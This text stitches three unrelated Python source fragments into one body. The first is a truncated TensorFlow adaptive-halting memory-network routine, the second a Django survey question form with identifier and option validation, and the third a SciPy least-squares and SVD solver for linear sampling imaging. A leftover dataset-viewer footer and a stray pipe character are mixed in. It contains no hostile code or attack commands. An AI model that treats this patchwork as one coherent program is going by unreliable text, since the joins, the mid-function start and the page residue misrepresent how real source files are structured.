        # set initial state to zero
        h = tf.zeros((self.batch_size, self.hidden_size))
        # use attention gru
        for i, fv in enumerate(fact_vecs_t):
            h = self._attention_GRU_step(fv, h, softs[i])
            gru_outputs.append(h)
        # extract gru outputs at proper index according to input_lens
        gru_outputs = tf.pack(gru_outputs)
        gru_outputs = tf.transpose(gru_outputs, perm=[1,0,2])
        #analogous to output, new_state = self.inference_cell(input,state)
        episode = _last_relevant(gru_outputs, self.input_len_placeholder)
        ''' # TARGET_SIDE ATTENTION
        episode = self.generate_episode(prev_memory, fact_vecs, concat_all)
        '''
        # Per-example halting probability for this hop (ACT-style).
        p = tf.squeeze(tf.sigmoid(self.shared_linear_layer(episode, 1, True)))
        # Still-running examples: accumulated prob stays below 1 - eps.
        new_batch_mask = tf.logical_and(tf.less(prob + p,self.one_minus_eps),batch_mask)
        new_float_mask = tf.cast(new_batch_mask, tf.float32)
        prob += p * new_float_mask
        prob_compare += p * tf.cast(batch_mask, tf.float32)
        '''based on github.com/tensorflow/tensorflow/issues/5608#issuecomment-260549420'''
        #untied
        Wt = weight_container.read(counter_int)
        bt = bias_container.read(counter_int)
        #tied
        #Wt = weight_container.read(0)
        #bt = bias_container.read(0)
        counter_int+=1
        def use_remainder():
            # Final hop for halted examples: weight the episode by the
            # remaining probability mass (1 - accumulated prob).
            remainder = tf.constant(1.0, tf.float32,[self.batch_size]) - prob
            remainder_expanded = tf.expand_dims(remainder,1)
            tiled_remainder = tf.tile(remainder_expanded,[1,self.hidden_size])
            acc_state = tf.nn.relu(tf.matmul(tf.concat(1, [acc_states, episode * tiled_remainder]), Wt) + bt)
            return acc_state
        def normal():
            # Ordinary hop: weight the episode by this hop's halting prob.
            p_expanded = tf.expand_dims(p * new_float_mask,1)
            tiled_p = tf.tile(p_expanded,[1,self.hidden_size])
            acc_state = tf.nn.relu(tf.matmul(tf.concat(1, [acc_states, episode * tiled_p]), Wt) + bt)
            return acc_state
        counter += tf.constant(1.0,tf.float32,[self.batch_size]) * new_float_mask
        counter_condition = tf.less(counter,self.N)
        condition = tf.reduce_any(tf.logical_and(new_batch_mask,counter_condition))
        acc_state = tf.cond(condition, normal, use_remainder)
        '''ADD MECHANISM TO INCREASE HALT PROB IF MULTIPLE SIMILAR ATTENTION MASKS IN A ROW;
        would be the difference between consecutive attention masks
        based on this cooment: reddit.com/r/MachineLearning/comments/59sfz8/research_learning_to_reason_with_adaptive/d9bgqxw/'''
        return (new_batch_mask, prob_compare, prob, counter, episode, fact_vecs, acc_state, counter_int, weight_container, bias_container)

    #analogous to do_inference_steps
    def do_generate_episodes(self, prev_memory, fact_vecs, batch_size, hidden_size, max_input_len, input_len_placeholder, max_num_hops, epsilon, weight_container, bias_container):
        """Run generate_episode in a tf.while_loop until every example halts.

        Iterates until each batch element has either accumulated halting
        probability >= 1 - epsilon or performed max_num_hops hops.
        Returns (final accumulated state, remainders, iteration counts).
        """
        self.batch_size = batch_size
        self.hidden_size = hidden_size
        self.max_input_len = max_input_len
        self.input_len_placeholder = input_len_placeholder
        counter_int=tf.constant(0)
        self.shared_linear_layer = tf.make_template('shared_linear_layer', tf.nn.rnn_cell._linear)
        self.one_minus_eps = tf.constant(1.0 - epsilon, tf.float32,[self.batch_size])
        self.N = tf.constant(max_num_hops, tf.float32,[self.batch_size])
        prob = tf.constant(0.0,tf.float32,[self.batch_size], name="prob")
        prob_compare = tf.constant(0.0,tf.float32,[self.batch_size], name="prob_compare")
        counter = tf.constant(0.0, tf.float32,[self.batch_size], name="counter")
        self.counter = tf.constant(0.0, tf.float32,[self.batch_size], name="counter")
        acc_states = tf.zeros_like(prev_memory, tf.float32, name="state_accumulator")
        batch_mask = tf.constant(True, tf.bool,[self.batch_size])
        # While loop stops when this predicate is FALSE.
        # Ie all (probability < 1-eps AND counter < N) are false.
        pred = lambda batch_mask, prob_compare, prob,\
            counter, prev_memory, fact_vecs, acc_state, counter_int, weight_container, bias_container:\
            tf.reduce_any(
                tf.logical_and(
                    tf.less(prob_compare,self.one_minus_eps),
                    tf.less(counter,self.N)))
        # only stop if all of the batch have passed either threshold
        # Do while loop iterations until predicate above is false.
        _,_,remainders,iterations,_,_,state,_,_,_ = \
            tf.while_loop(pred, self.generate_episode,
                [batch_mask, prob_compare, prob,
                 counter, prev_memory, fact_vecs, acc_states, counter_int, weight_container, bias_container])
        return state, remainders, iterations
<reponame>ericazhou7/uSurvey<filename>survey/forms/question.py
from django import forms
from django.forms import ModelForm
import re
from django.core.exceptions import ValidationError
from django.conf import settings
from survey.models import Question, BatchQuestion, QuestionSet
from survey.models import (QuestionOption, Batch, Answer, QuestionModule, MultiChoiceAnswer, MultiSelectAnswer,
QuestionFlow, AnswerAccessDefinition, ResponseValidation, DateAnswer, TextAnswer,
NumericalAnswer, AutoResponse, SurveyParameterList)
from survey.forms.form_helper import FormOrderMixin, Icons
class ValidationField(forms.ModelChoiceField, Icons):
    """ModelChoiceField combined with the Icons mixin so templates can render
    action icons (e.g. the add-validation button) next to the field."""
    pass
def get_question_form(model_class):
    """Factory: build and return a QuestionForm ModelForm bound to *model_class*.

    NOTE(review): clean_options relies on ``filter``/``map`` returning lists
    (Python 2 semantics) — the resulting cleaned value is iterated again in
    save_question_options. Confirm interpreter version before porting.
    """
    class QuestionForm(ModelForm, FormOrderMixin):
        # Answer types whose responses may carry a ResponseValidation rule.
        VALIDATION_ANSWER_TYPES = [DateAnswer.choice_name(), TextAnswer.choice_name(),
                                   NumericalAnswer.choice_name(), AutoResponse.choice_name()]
        options = forms.CharField(max_length=50, widget=forms.HiddenInput(), required=False)
        response_validation = ValidationField(queryset=ResponseValidation.objects.all(), required=False)

        def __init__(
                self,
                qset,
                data=None,
                initial=None,
                parent_question=None,
                instance=None,
                prev_question=None):
            """Bind the form to a question set and restrict its choices.

            Args:
                qset: the QuestionSet (e.g. Batch) this question belongs to.
                parent_question: optional parent for sub-questions.
                prev_question: question after which this one is inserted.
            """
            super(QuestionForm, self).__init__(
                data=data, initial=initial, instance=instance)
            self.fields['identifier'].label = "Variable name"
            self.fields['qset'].widget = forms.HiddenInput()
            self.fields['qset'].initial = qset.pk
            self.qset = qset
            self.prev_question = prev_question
            # depending on type of ussd/odk access of qset restrict the answer
            # type
            self.fields['answer_type'].choices = [
                choice for choice in self.fields['answer_type'].choices if choice[0] in qset.answer_types]
            self.fields['answer_type'].choices.insert(
                0, ('', '----Select Answer Type----'))
            if instance:
                self.help_text = ' and '.join(AnswerAccessDefinition.access_channels(instance.answer_type))
                self.fields['answer_type'].help_text = self.help_text
            # Map each answer type to the channels (USSD/ODK/...) supporting it.
            self.answer_map = {}
            definitions = AnswerAccessDefinition.objects.all()
            for defi in definitions:
                self.answer_map[defi.answer_type] = self.answer_map.get(defi.answer_type, [])
                self.answer_map[defi.answer_type].append(defi.channel)
            self.fields['response_validation'].icons = {'add': {'data-toggle': "modal",
                                                                'data-target': "#add_validation",
                                                                'id': 'add_validation_button',
                                                                'title': 'Add Validation'},
                                                        }
            self.parent_question = parent_question
            self.order_fields(['module', 'group', 'identifier',
                               'text', 'answer_type', 'mandatory'])

        class Meta:
            model = model_class
            exclude = []
            widgets = {
                'text': forms.Textarea(
                    attrs={
                        "rows": 5,
                        "cols": 30,
                        "maxlength": "150",
                    }),
            }

        def clean_group(self):
            """Reject groups whose parameter identifiers collide with existing
            questions in this question set or its survey's listing form."""
            group = self.cleaned_data['group']
            if group:
                qset = QuestionSet.get(id=self.qset.pk)
                identifiers = group.parameter_questions().values_list('identifier', flat=True)
                existing_identifiers = Question.objects.filter(identifier__in=identifiers,
                                                               qset__pk=self.qset.pk).values_list('identifier',
                                                                                                  flat=True)
                if existing_identifiers.exists():
                    raise ValidationError(
                        '%s already exist in this %s. '
                        'Consider creating a question with modified identifier name and using skip logic in your %s' %
                        (','.join(existing_identifiers), qset.verbose_name(), qset.verbose_name()))
                if hasattr(qset, 'survey') and qset.survey.listing_form:
                    existing_identifiers = qset.survey.listing_form.questions.filter(identifier__in=identifiers
                                                                                     ).values_list('identifier',
                                                                                                   flat=True)
                    if existing_identifiers.exists():
                        raise ValidationError(
                            '%s already exist as a listing question for this %s. '
                            'Consider creating a question with modified identifier name '
                            'and using skip logic in your %s' %
                            (','.join(existing_identifiers), qset.verbose_name(), qset.verbose_name()))
            return group

        def clean_options(self):
            """Normalize submitted multi-choice options (drop blanks, collapse
            spaces, strip whitespace)."""
            options = dict(self.data).get('options')
            if options:
                options = filter(lambda text: text.strip(), options)
                # options = map(lambda option: re.sub("[%s]" % settings.USSD_IGNORED_CHARACTERS, '', option), options)
                options = map(
                    lambda option: re.sub(
                        " ", ' ', option), options)
                options = map(lambda option: option.strip(), options)
                self.cleaned_data['options'] = options
            return options

        def clean_identifier(self):
            """Validate the identifier's format and its uniqueness across the
            question set, its group parameters and the survey listing form."""
            identifier = self.cleaned_data['identifier']
            pattern = '^[a-zA-Z][0-9a-zA-Z_]+$'
            if re.match(pattern, identifier) is None:
                raise ValidationError(
                    'Identifier must start with a letter, and must contain alphanumeric values or _')
            if Question.objects.filter(
                    identifier__iexact=identifier,
                    qset__pk=self.qset.pk).exists():
                # Unchanged identifier on an existing instance is allowed.
                if self.instance and self.instance.identifier == identifier:
                    pass
                else:
                    raise ValidationError(
                        '%s already in use for this %s' %
                        (identifier, model_class.type_name()))
            # if this is a batch question also check if there are parameter
            # questions with this name
            qset = QuestionSet.get(id=self.qset.pk)
            if hasattr(
                    qset,
                    'parameter_list') and qset.parameter_list and qset.parameter_list.parameters.filter(
                    identifier__iexact=identifier).exists():
                raise ValidationError(
                    '%s is already in captured as a group parameter for this %s' %
                    (identifier, qset.verbose_name()))
            # for sampled surveys, check if this is already implemented in listing
            if hasattr(qset, 'survey') and qset.survey.listing_form and qset.survey.listing_form.questions.filter(
                    identifier__iexact=identifier).exists():
                raise ValidationError(
                    '%s is already in captured as a listing question for this %s' %
                    (identifier, qset.verbose_name()))
            return self.cleaned_data['identifier']

        def clean_text(self):
            """Make sure any field referenced here belongs to same batch. Field refs are denoted by {{.+}} brackets
            :return:
            """
            pattern = '{{ *([0-9a-zA-Z_]+) *}}'
            label = self.data.get('text', '')
            requested_identifiers = re.findall(pattern, label)
            if requested_identifiers:
                ids = self.qset.questions.filter(
                    identifier__in=requested_identifiers).values_list(
                    'identifier', flat=True)
                ids = list(ids)
                if len(set(ids)) != len(set(requested_identifiers)):
                    raise ValidationError(
                        '%s is not in %s' %
                        (', '.join(
                            set(requested_identifiers).difference(ids)),
                            self.qset.name))
            return self.cleaned_data['text']

        def clean(self):
            """Cross-field validation: options vs answer type compatibility and
            response-validation compatibility with the chosen answer class."""
            answer_type = self.cleaned_data.get('answer_type', None)
            options = self.cleaned_data.get('options', None)
            response_validation = self.cleaned_data.get('response_validation', None)
            text = self.cleaned_data.get('text', None)
            self._check__multichoice_and_options_compatibility(
                answer_type, options)
            self._strip_special_characters_for_ussd(text)
            if answer_type:
                answer_class = Answer.get_class(answer_type)
                validator_names = [validator.__name__ for validator in answer_class.validators()]
                if response_validation and response_validation.validation_test not in validator_names:
                    raise ValidationError('Selected Validation is not compatible with chosen answer type')
            return self.cleaned_data

        def _check__multichoice_and_options_compatibility(
                self, answer_type, options):
            """Multi-choice answer types require options; other types drop them."""
            if answer_type in [
                    MultiChoiceAnswer.choice_name(),
                    MultiSelectAnswer.choice_name()] and not options:
                message = 'Question Options missing.'
                self._errors['answer_type'] = self.error_class([message])
                del self.cleaned_data['answer_type']
            if answer_type not in [
                    MultiChoiceAnswer.choice_name(),
                    MultiSelectAnswer.choice_name()] and options:
                del self.cleaned_data['options']

        def _strip_special_characters_for_ussd(self, text):
            """Remove characters the USSD channel cannot render from the text."""
            if text:
                text = re.sub(
                    "[%s]" %
                    settings.USSD_IGNORED_CHARACTERS,
                    '',
                    text)
                self.cleaned_data['text'] = re.sub(" ", ' ', text)

        def kwargs_has_batch(self, **kwargs):
            """Return True when the caller supplied a Batch as the qset kwarg."""
            return 'qset' in kwargs and isinstance(kwargs['qset'], Batch)

        def options_supplied(self, commit):
            """Return truthy when saving should also persist supplied options."""
            return commit and self.cleaned_data.get('options', None)

        def save_question_options(self, question):
            """Replace the question's options with the cleaned submission, in
            submission order (order is 1-based)."""
            order = 0
            options = self.cleaned_data['options']
            question.options.all().delete()
            # options.sort()
            for text in options:
                order += 1
                QuestionOption.objects.create(
                    question=question, text=text, order=order)

        def save(self, commit=True, zombie=False, **kwargs):
            """Persist the question and splice it into the question-set flow.

            New questions are inserted after prev_question (or the last inline
            question); zombie=True skips flow rewiring.
            """
            question = super(QuestionForm, self).save(commit=False)
            qset = question.qset
            if commit:
                if question.pk is None:
                    question.save()
                    # get the last question inline
                    # create a inline flow with current qset
                    qset = question.qset
                    # qset = QuestionSet.get(id=qset.id)
                    if self.prev_question:
                        last_question = self.prev_question
                    else:
                        last_question = qset.last_question_inline()
                    if last_question:
                        if zombie is False:
                            # incase, inline flow with no next quest already
                            # exists
                            flow, _ = QuestionFlow.objects.get_or_create(
                                question=last_question, validation__isnull=True)
                            prev_next_question = flow.next_question
                            flow.next_question = question
                            flow.save()
                            # now connect present question back to the flow
                            QuestionFlow.objects.create(
                                question=question, next_question=prev_next_question)
                    elif qset.start_question is None:
                        qset.start_question = question
                        qset.save()
                else:
                    question.save()
                if hasattr(qset, 'survey'):  # basicallyy check for Batch scenario
                    SurveyParameterList.update_parameter_list(qset)
                # self.qset.questions_inline.invalidate()
            if self.options_supplied(commit):
                self.save_question_options(question)
            return question
    return QuestionForm
# Concrete form classes bound to the Question and BatchQuestion models,
# produced by the factory above.
QuestionForm = get_question_form(Question)
BatchQuestionForm = get_question_form(BatchQuestion)
|
import time
import numpy as np
from tqdm import trange
import scipy.sparse as sp
from scipy.linalg import norm
from joblib import Parallel, delayed
from vezda.math_utils import humanReadable
from vezda.svd_utils import load_svd, svd_needs_recomputing, compute_svd
from vezda.LinearOperators import asConvolutionalOperator
def scipy_lsmr(A, b, damp, atol, btol):
    """Run scipy's LSMR least-squares solver, returning only the solution vector."""
    result = sp.linalg.lsmr(A, b, damp, atol, btol)
    return result[0]
def scipy_lsqr(A, b, damp, atol, btol):
    """Run scipy's LSQR least-squares solver, returning only the solution vector."""
    result = sp.linalg.lsqr(A, b, damp, atol, btol)
    x = result[0]
    return x
def inverse_svd(V, Sp, Uh, b):
    """Apply the pseudoinverse A+ = V Sp Uh to the right-hand side b."""
    projected = Uh.dot(b)
    filtered = Sp.dot(projected)
    return V.dot(filtered)
#==============================================================================
# Super class (Parent class)
# A class for solving linear systems Ax = b
#
# Class data objects:
# linear operator: A
# right-hand side vectors: B = [b1 b2 ... bn]
#
# Class methods:
# solve by iterative least-squares: solve_lsmr
# solve by iterative least-squares: solve_lsqr
# solve by singular-value decomposition: solve_svd
#==============================================================================
class LinearSystem(object):
    """Solve linear systems A x = b_i for a batch of right-hand sides.

    Attributes:
        A: the linear operator (matrix or scipy LinearOperator) with .shape.
        B: right-hand sides stacked as a 3D array; B[:, :, i] is b_i.
    """

    def __init__(self, LinearOperator, rhs_vectors):
        self.A = LinearOperator
        self.B = rhs_vectors

    def _solve_iterative(self, solver, damp, atol, btol, nproc):
        """Apply `solver` to every right-hand side, optionally in parallel.

        Shared driver for solve_lsmr/solve_lsqr: both differ only in the
        scipy routine used per column.
        """
        M, N = self.A.shape
        K = self.B.shape[2]
        if nproc != 1:
            startTime = time.time()
            X = Parallel(n_jobs=nproc, verbose=11)(
                    delayed(solver)(self.A, self.B[:, :, i].reshape(M),
                                    damp=damp, atol=atol, btol=btol)
                    for i in range(K))
            endTime = time.time()
            X = np.asarray(X, dtype=self.A.dtype).T
        else:
            # initialize solution matrix X
            X = np.zeros((N, K), dtype=self.A.dtype)
            startTime = time.time()
            for i in trange(K):
                X[:, i] = solver(self.A, self.B[:, :, i].reshape(M),
                                 damp=damp, atol=atol, btol=btol)
            endTime = time.time()
        print('Elapsed time:', humanReadable(endTime - startTime))
        return X

    def solve_lsmr(self, damp=0.0, atol=1.0e-8, btol=1.0e-8, nproc=1, fft=False):
        """Solve all systems with LSMR. `fft` is accepted but unused here."""
        return self._solve_iterative(scipy_lsmr, damp, atol, btol, nproc)

    def solve_lsqr(self, damp=0.0, atol=1.0e-8, btol=1.0e-8, nproc=1):
        """Solve all systems with LSQR."""
        return self._solve_iterative(scipy_lsqr, damp, atol, btol, nproc)

    def solve_svd(self, U, s, Vh, alpha=0.0, nproc=1):
        """Solve all systems via the (regularized) pseudoinverse A+ = V Sp Uh.

        Args:
            U, s, Vh: singular triplet of A.
            alpha: Tikhonov regularization parameter.
            nproc: number of parallel jobs (1 = serial with progress bar).
        """
        #======================================================================
        # Construct the pseudoinverse of A : A+ = V Sp Uh
        if np.issubdtype(U.dtype, np.complexfloating):
            # singular vectors are complex
            Uh = U.getH()
            V = Vh.getH()
        else:
            # singular vectors are real
            Uh = U.T
            V = Vh.T
        # Filtered inverse singular values s / (alpha + s**2) on the diagonal.
        Sp = sp.diags(np.divide(s, alpha + s**2))
        #======================================================================
        # Apply SVD to obtain solution matrix X
        M, N = self.A.shape
        K = self.B.shape[2]
        if nproc != 1:
            startTime = time.time()
            X = Parallel(n_jobs=nproc, verbose=11)(
                    delayed(inverse_svd)(V, Sp, Uh, self.B[:, :, i].reshape(M))
                    for i in range(K))
            endTime = time.time()
            X = np.asarray(X, dtype=self.A.dtype).T
        else:
            # initialize solution matrix X
            X = np.zeros((N, K), dtype=self.A.dtype)
            startTime = time.time()
            for i in trange(K):
                X[:, i] = inverse_svd(V, Sp, Uh, self.B[:, :, i].reshape(M))
            endTime = time.time()
        print('Elapsed time:', humanReadable(endTime - startTime))
        return X
#==============================================================================
# Subclass (Derived class)
# A class for solving linear sampling problems of the form Ax = b
#
# Class data objects:
# kernel: data or test functions
# right-hand side vectors: B = [b1 b2 ... bn]
#
# Class methods:
# solve system of equations using specified method: solve(method)
# construst image from solutions: construct_image()
#==============================================================================
class LinearSamplingProblem(LinearSystem):
    """Linear sampling problem A x = b built from a data/test-function kernel.

    Attributes:
        operatorName: 'nfo' (near-field operator) or 'lso' (linear sampling
            operator); selects the SVD cache file and the imaging formula.
        kernel: the data or test functions defining the operator.
    """

    def __init__(self, operatorName, kernel, rhs_vectors):
        super().__init__(asConvolutionalOperator(kernel), rhs_vectors)
        self.operatorName = operatorName
        self.kernel = kernel

    def solve(self, method, fly=True, nproc=1, alpha=0.0, atol=1.0e-8, btol=1.0e-8, k=None):
        '''
        method : specified direct or iterative method for solving Ax = b
        fly : compute on the fly (forwarded only to the lsmr path)
        nproc : number of parallel processes
        alpha : regularization parameter
        atol : error tolerance for the linear operator
        btol : error tolerance for the right-hand side vectors
        k : number of singular values/vectors
        '''
        #======================================================================
        if method == 'lsmr':
            print('Localizing targets...')
            return super().solve_lsmr(alpha, atol, btol, nproc, fly)
        elif method == 'lsqr':
            print('Localizing targets...')
            # BUG FIX: solve_lsqr() takes (damp, atol, btol, nproc); the
            # previous extra 'fly' argument raised a TypeError.
            return super().solve_lsqr(alpha, atol, btol, nproc)
        elif method == 'svd':
            # Load or recompute the SVD of A as needed
            if self.operatorName == 'nfo':
                filename = 'NFO_SVD.npz'
            elif self.operatorName == 'lso':
                filename = 'LSO_SVD.npz'
            else:
                # BUG FIX: previously 'filename' was left unbound here and a
                # NameError surfaced later; fail fast with a clear message.
                raise ValueError('Unknown operator name: %s' % self.operatorName)
            try:
                U, s, Vh = load_svd(filename)
                if svd_needs_recomputing(self.kernel, k, U, s, Vh):
                    U, s, Vh = compute_svd(self.kernel, k, self.operatorName)
            except IOError as err:
                print(err.strerror)
                if k is None:
                    k = input('Specify the number of singular values and vectors to compute: ')
                U, s, Vh = compute_svd(self.kernel, k, self.operatorName)
            print('Localizing targets...')
            # BUG FIX: solve_svd() takes (U, s, Vh, alpha, nproc); the
            # previous extra 'fly' argument raised a TypeError.
            return super().solve_svd(U, s, Vh, alpha, nproc)

    def construct_image(self, solutions):
        """Construct the indicator image from the per-point solution norms.

        For 'nfo' the image is the normalized reciprocal solution norm; for
        'lso' it is the root-mean-square of per-system normalized indicators.
        """
        print('Constructing the image...')
        # Get machine precision
        eps = np.finfo(float).eps  # about 2e-16 (used in division
                                   # so we never divide by zero)
        if self.operatorName == 'nfo':
            Image = 1.0 / (norm(solutions, axis=0) + eps)
            # Normalize Image to take on values between 0 and 1
            Imin = np.min(Image)
            Imax = np.max(Image)
            Image = (Image - Imin) / (Imax - Imin + eps)
        elif self.operatorName == 'lso':
            Nm, Nsp = self.kernel.shape[1], self.kernel.shape[2]
            K = solutions.shape[1]
            solutions = solutions.reshape((Nsp, Nm, K))
            # Initialize the Image
            Image = np.zeros(Nsp)
            for i in range(K):
                indicator = norm(solutions[:, :, i], axis=1)
                Imin = np.min(indicator)
                Imax = np.max(indicator)
                indicator = (indicator - Imin) / (Imax - Imin + eps)
                Image += indicator**2
            # Image is defined as the root-mean-square indicator
            Image = np.sqrt(Image / K)
        return Image
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.